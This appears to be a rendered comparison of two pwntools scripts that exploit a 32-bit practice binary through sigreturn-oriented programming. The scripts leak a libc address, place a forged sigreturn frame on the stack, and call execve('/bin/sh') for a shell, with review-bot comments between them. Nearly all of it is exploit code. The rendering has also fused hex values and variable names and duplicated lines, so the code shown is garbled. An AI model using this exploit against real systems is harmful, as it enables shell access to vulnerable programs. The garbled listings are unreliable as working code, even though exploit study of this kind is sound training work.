


srop.py
from pwn import *
  
binary = ELF('./srop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)

#You need to change the value to match the environment you are testing.
libcBase = stackAddr - 0x49020
syscall = libcBase + 0x1d8de60x1d5de6
binsh = libcBase + 0x15902b
ksigreturn = libcBase + 0x1d8de00x1d5de0

print 'The base address of Libc    : ' + hex(libcBase)
print 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)

exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn)
exploit += p32(0x0)
 
exploit += p32(0x0)         #GS
exploit += p32(0x0)         #FS
exploit += p32(0x0)         #ES
exploit += p32(0x0)         #DS
exploit += p32(0x0)         #EDI
exploit += p32(0x0)         #ESI
exploit += p32(0x0)         #EBP
exploit += p32(syscall)     #ESP
exploit += p32(binsh)       #EBX
exploit += p32(0x0)         #EDX
exploit += p32(0x0)         #ECX
exploit += p32(0xb)         #EAX
exploit += p32(0x0)         #trapno
exploit += p32(0x0)         #err
 
exploit += p32(syscall)     #EIP
#Runed a 32bit program in the 64bit operation system.
exploit += p32(0x23)        #CS
exploit += p32(0x0)         #eflags
exploit += p32(0x0)         #esp_atsignal
exploit += p32(0x2b)        #SS
 
p.send(exploit)
p.interactive()#Runed a 32bit program in the 32bit operation system.
#exploit += p32(0x73)        #CS
#exploit += p32(0x0)         #eflags
#exploit += p32(0x0)         #esp_atsignal
#exploit += p32(0x7b)        #SS
 
p.send(exploit)
p.interactive()
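Review bot: The literals on L25 and L27 (`0x1d8de60x1d5de6`, `0x1d8de00x1d5de0`) are two hex values fused by the version comparison, so the listing as rendered is not valid Python; the same artifact recurs in the second listing at L87–L89, where variable names and values are fused, and at L105 (`constants.SYS_execve0xb`). The comment on L23 says the offsets must match the test environment but not which libc build they were measured against, which is exactly what a reader needs in order to understand why their own values differ; I would extend it to `# Offsets below were taken from <libc build / distro — placeholder>; they will not match any other build.` L61–L69 also show the `p.send(exploit)` / `p.interactive()` pair twice with a comment fused onto L62, which looks like both versions' trailers rendered together rather than intentional code.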
  • pwntools를 이용해 조금더 편하게 코드를 작성할 수 있습니다.
srop-pwn.py
from pwn import *
 
binary = ELF('./srop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
)
stackAddr = int(stackAddr,16)

#You need to change the value to match the environment you are testing.
libcBase = stackAddr - 0x49020
syscallksigreturn = libcBase + 0x1d8de60x1d5de0 
binshsyscall = libcBase + 0x15902b0x1d5de6 
ksigreturnbinsh = libcBase + 0x1d8de00x15902b

print 'The base address of Libc    : ' + hex(libcBase)
print 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)
 
exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn) 	#ret
exploit += p32(0x0)

#Runed a 32bit program in the 64bit operation system.
frame = SigreturnFrame(kernel='amd64')
#Runed a 32bit program in the 32bit operation system.
#frame = SigreturnFrame(kernel='i386')
frame.eax = constants.SYS_execve0xb
frame.ebx = binsh
frame.esp = syscall 
frame.eip = syscall
 
exploit += str(frame)

p.send(exploit)
p.interactive()
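Review bot: L82–L83 contain a stray `)` and a second `stackAddr = int(stackAddr,16)` that belong to neither version's control flow; they appear to be a leftover of the comparison rendering, and as shown the script would stop with a SyntaxError at L82. The `SigreturnFrame(kernel='amd64')` / `kernel='i386'` choice on L101–L104 is the one environment-dependent line here, and the surrounding comments explain it only tersely; I would reword them to `# kernel= selects the frame layout for the running kernel: 'amd64' when this 32-bit binary runs under a 64-bit kernel, 'i386' on a native 32-bit kernel.` Using `constants.SYS_execve` on L105 instead of the bare `0xb` used at L50 in the first listing is the clearer style; the first listing's frame comments would read better with the same named constant.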
